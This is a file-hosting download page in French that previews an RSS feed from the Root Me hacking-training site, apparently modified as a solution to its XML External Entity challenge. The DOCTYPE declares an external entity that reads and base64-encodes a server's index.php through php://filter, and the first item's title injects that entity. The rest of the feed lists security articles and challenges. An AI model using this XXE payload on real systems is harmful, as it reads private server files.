hack null.xml
À propos du fichier
- Type de fichier
- Fichier XML de 17 Ko (application/xml)
- Confidentialité
- Fichier public, envoyé le 21 octobre 2014 à 23:01, depuis l'adresse IP 31.38.x.x (France)
- Sécurité
- Ne contient aucun Virus ou Malware connus - Dernière vérification: 22 heures
- Statistiques
- La présente page de téléchargement a été vue 2569 fois depuis l'envoi du fichier
- Page de téléchargement
-
Aperçu du fichier
<?xml
version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [<!ENTITY xxefca0a SYSTEM "php://filter/read=convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php"> ]>
<rss version="2.0"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
>
<channel xml:lang="fr">
<title>Root Me : plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information</title>
<link>http://www.root-me.org/</link>
<description>plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information</description>
<language>fr</language>
<generator>SPIP - www.spip.net</generator>
<image>
<title>Root Me : plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information</title>
<url>http://www.root-me.org/local/cache-vignettes/L144xH33/siteon0-e281c.png</url>
<link>http://www.root-me.org/</link>
<height>33</height>
<width>144</width>
</image>
<item
xml:lang="fr"><title>&xxefca0a;</title><link>http://www.root-me.org/fr/Capture-The-Flag/Calendrier/Calendrier</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Capture-The-Flag/Calendrier/Calendrier</guid>
<dc:date>2014-10-12T16:09:56Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>m31z0nyx</dc:creator>
<description>
-
<a href="http://www.root-me.org/fr/Capture-The-Flag/Calendrier/" rel="directory">Calendrier</a>
</description>
</item>
<item
xml:lang="fr"><title>Python - exécution de code natif sous Windows</title><link>http://www.root-me.org/fr/Documentation/Applicatif/Python-execution-de-code-natif-sous-Windows</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/Python-execution-de-code-natif-sous-Windows</guid>
<dc:date>2014-09-15T11:40:12Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>Tomtombinary</dc:creator>
<description><p>Vous êtes dans un dossier avec peu de liberté où les exécutables ne sont pas admis ,solution le script python !<br class='autobr' />
Par exemple avast en mode renforcé , bloque l'exécution de chaque exécutable inconnu ,mais pas l'exécution des scripts python .</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
</item>
<item
xml:lang="fr"><title>ARM : architecture & assembleur</title><link>http://www.root-me.org/fr/Documentation/Applicatif/ARM-architecture-assembleur</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/ARM-architecture-assembleur</guid>
<dc:date>2014-06-17T18:02:39Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>Tosh</dc:creator>
<description><p>Dans cet article il sera question d'aborder l'architecture ARM, ainsi que son jeu d'instructions.</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
<enclosure
url="http://www.root-me.org/IMG/pdf/arm_instruction_set.pdf" length="191615" type="application/pdf" />
<enclosure
url="http://www.root-me.org/IMG/pdf/arm-instructionset.pdf" length="447819" type="application/pdf" />
</item>
<item
xml:lang="fr"><title>Putty</title><link>http://www.root-me.org/fr/Outils/Putty</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Outils/Putty</guid>
<dc:date>2013-12-10T17:38:22Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>NoLiMiT</dc:creator>
<description>
<p>PuTTY est un programme permettant de se connecter à distance sur des serveurs en utilisant les protocoles SSH, Telnet ou Rlogin.<br class='autobr' />
L'ensemble des sessions peuvent être automatiquement enregistrées dans un rapport qui pourra être consulté ultérieurement. La fenêtre de commandes est personnalisable afin de convenir à tous les utilisateurs : il est possible de modifier le type de curseur, les couleurs, la police de caractère utilisée, etc. Les connexions sont également paramétrables : il est possible de (...)</p>
-
<a href="http://www.root-me.org/fr/Outils/" rel="directory">Outils</a>
</description>
</item>
<item
xml:lang="fr"><title>Scapy</title><link>http://www.root-me.org/fr/Outils/Analyseur/Reseau/Scapy</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Outils/Analyseur/Reseau/Scapy</guid>
<dc:date>2013-12-10T17:38:17Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>NoLiMiT</dc:creator>
<description><p><img src="http://www.root-me.org/squelettes-dist/puce.gif" width="8" height="11" class="puce" alt="-" /> Scapy est un module pour Python permettant de forger, envoyer, réceptionner et manipuler des paquets réseau.</p>
-
<a href="http://www.root-me.org/fr/Outils/Analyseur/Reseau/" rel="directory">Reseau</a>
</description>
</item>
<item
xml:lang="fr"><title>RunPE</title><link>http://www.root-me.org/fr/Documentation/Applicatif/RunPE</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/RunPE</guid>
<dc:date>2013-12-04T10:16:15Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>Thanat0s</dc:creator>
<description>
<p>RunPE est le nom générique d'une technique utilisée par de nombreux malwares.<br class='autobr' />
Cette technique consiste à lancer un nouveau processus en pause, puis de remplacer le contenu mémoire de l'exécutable en pause et enfin de relâcher le processus. Cela permet d'exécuter un exécutable complet sans avoir à le déposer sur le disque. Cela permet d'éviter la détections par les antivirus d'accès.<br class='autobr' />
Prenons un exemple. dans un Buffer nous avons l'image complète d'un fichier exécutable windows (PE).<br class='autobr' />
La première étape est de (...)</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
</item>
<item
xml:lang="fr"><title>Débordement de tampon - utiliser l'environnement</title><link>http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-utiliser-l-environnement</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-utiliser-l-environnement</guid>
<dc:date>2013-06-16T12:21:02Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>S3cur3D</dc:creator>
<description><p>Dans cet article nous allons étudier le cas, courant, où le buffer est trop petit pour accueillir notre buffer travaillé (NOP Sled + Shellcode + Adresse de retour). L'idée de l'exploitation est simple : l'utilisation des variables d'environnement.</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
</item>
<item
xml:lang="fr"><title>Débordement de tampon - dans le tas</title><link>http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-dans-le-tas</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-dans-le-tas</guid>
<dc:date>2013-06-15T21:58:43Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>S3cur3D</dc:creator>
<description><p>Les deux types d'exploitation qui suivent (basés sur l'overflow dans les segments bss et heap) sont légèrement différents du stack-based overflow. Dans celui-ci, le but ultime est finalement d'écraser l'adresse de retour pour changer le flux d'éxécution du programme. Dans le cas que nous allons traiter, les cas de dépassement de mémoire dans le heap, il n'y a plus possibilité de déterminer l'éloignement de cette adresse de retour.</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
</item>
<item
xml:lang="fr"><title>Débordement de tampon - dans la pile</title><link>http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-dans-la-pile</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-dans-la-pile</guid>
<dc:date>2013-06-15T21:45:42Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>S3cur3D</dc:creator>
<description><p>Exploitation d'un stack-based overflow</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
</item>
<item
xml:lang="fr"><title>Débordement de tampon - allocation</title><link>http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-allocation</link>
<guid
isPermaLink="true">http://www.root-me.org/fr/Documentation/Applicatif/Debordement-de-tampon-allocation</guid>
<dc:date>2013-06-15T21:37:35Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>S3cur3D</dc:creator>
<description>
<p>Qu'est-ce qu'un buffer-overflow ?<br class='autobr' /> La traduction littérale suffit à expliquer le terme : c'est un dépassement du buffer, aussi appellé dépassement de mémoire tampon en français. Cela peut arriver très fréquemment. En effet, les langages de haut-niveau laissent au programmeur le soin de vérifier la non-corruption des données, entre autres de vérifier que les longueurs limites des tableaux ne peuvent en aucun cas être dépassées dans le programme. Concrètement, si le dépassement est petit, il va juste (...)</p>
-
<a href="http://www.root-me.org/fr/Documentation/Applicatif/" rel="directory">Applicatif</a>
</description>
</item>
<item xml:lang="fr">
<title>XML External Entity</title>
<link>http://www.root-me.org/fr/Challenges/Web-Serveur/XML-External-Entity</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Web-Serveur/XML-External-Entity</guid>
<dc:date>2014-10-20T14:23:03Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
sambecks
</dc:creator>
<dc:subject>Moyen</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Web-Serveur/" rel="directory">Web - Serveur</a>
</description>
</item>
<item xml:lang="fr">
<title>SQL injection - lecture de fichiers</title>
<link>http://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-lecture-de-fichiers</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-lecture-de-fichiers</guid>
<dc:date>2014-10-19T08:42:16Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
Arod
</dc:creator>
<dc:subject>Moyen</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Web-Serveur/" rel="directory">Web - Serveur</a>
</description>
</item>
<item xml:lang="fr">
<title>SNMP - Authentification</title>
<link>http://www.root-me.org/fr/Challenges/Reseau/SNMP-Authentification</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Reseau/SNMP-Authentification</guid>
<dc:date>2014-10-17T21:18:07Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
0x0ff.info
</dc:creator>
<dc:subject>Moyen</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Reseau/" rel="directory">Réseau</a>
</description>
</item>
<item xml:lang="fr">
<title>DotNet PE - 0 protections</title>
<link>http://www.root-me.org/fr/Challenges/Cracking/DotNet-PE-0-protections</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Cracking/DotNet-PE-0-protections</guid>
<dc:date>2014-09-15T11:41:49Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
bat86
</dc:creator>
<dc:subject>Facile</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Cracking/" rel="directory">Cracking</a>
</description>
</item>
<item xml:lang="fr">
<title>SQL injection - contournement de filtres</title>
<link>http://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-contournement-de-filtres</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-contournement-de-filtres</guid>
<dc:date>2014-07-21T17:24:54Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
sambecks
</dc:creator>
<dc:subject>Difficile</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Web-Serveur/" rel="directory">Web - Serveur</a>
</description>
</item>
<item xml:lang="fr">
<title>Problème du logarithme discret</title>
<link>http://www.root-me.org/fr/Challenges/Cryptanalyse/Probleme-du-logarithme-discret</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Cryptanalyse/Probleme-du-logarithme-discret</guid>
<dc:date>2014-06-08T12:23:34Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
RFC4949
</dc:creator>
<dc:subject>Difficile</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Cryptanalyse/" rel="directory">Cryptanalyse</a>
</description>
</item>
<item xml:lang="fr">
<title>Python - input()</title>
<link>http://www.root-me.org/fr/Challenges/App-Script/Python-input</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/App-Script/Python-input</guid>
<dc:date>2014-05-27T09:06:06Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
g0uZ
</dc:creator>
<dc:subject>Moyen</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/App-Script/" rel="directory">App - Script</a>
</description>
</item>
<item xml:lang="fr">
<title>Transposition - Rail Fence</title>
<link>http://www.root-me.org/fr/Challenges/Cryptanalyse/Transposition-Rail-Fence</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Cryptanalyse/Transposition-Rail-Fence</guid>
<dc:date>2014-04-06T14:46:04Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
YellowS4
</dc:creator>
<dc:subject>Moyen</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Cryptanalyse/" rel="directory">Cryptanalyse</a>
</description>
</item>
<item xml:lang="fr">
<title>PHP Sérialisation</title>
<link>http://www.root-me.org/fr/Challenges/Web-Serveur/PHP-Serialization</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Web-Serveur/PHP-Serialization</guid>
<dc:date>2014-02-03T21:22:06Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
Arod
</dc:creator>
<dc:subject>Moyen</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Web-Serveur/" rel="directory">Web - Serveur</a>
</description>
</item>
<item xml:lang="fr">
<title>PE - RunPE</title>
<link>http://www.root-me.org/fr/Challenges/Cracking/PE-RunPE</link>
<guid isPermaLink="true">http://www.root-me.org/fr/Challenges/Cracking/PE-RunPE</guid>
<dc:date>2013-12-16T09:18:00Z</dc:date>
<dc:format>text/html</dc:format>
<dc:language>fr</dc:language>
<dc:creator>
Thanat0s
</dc:creator>
<dc:subject>Difficile</dc:subject>
<description>
-
<a href="http://www.root-me.org/fr/Challenges/Cracking/" rel="directory">Cracking</a>
</description>
</item>
</channel>
</rss>
Partager le fichier hack_null.xml sur le Web et les réseaux sociaux:
Télécharger le fichier hack_null.xml
Télécharger hack_null.xml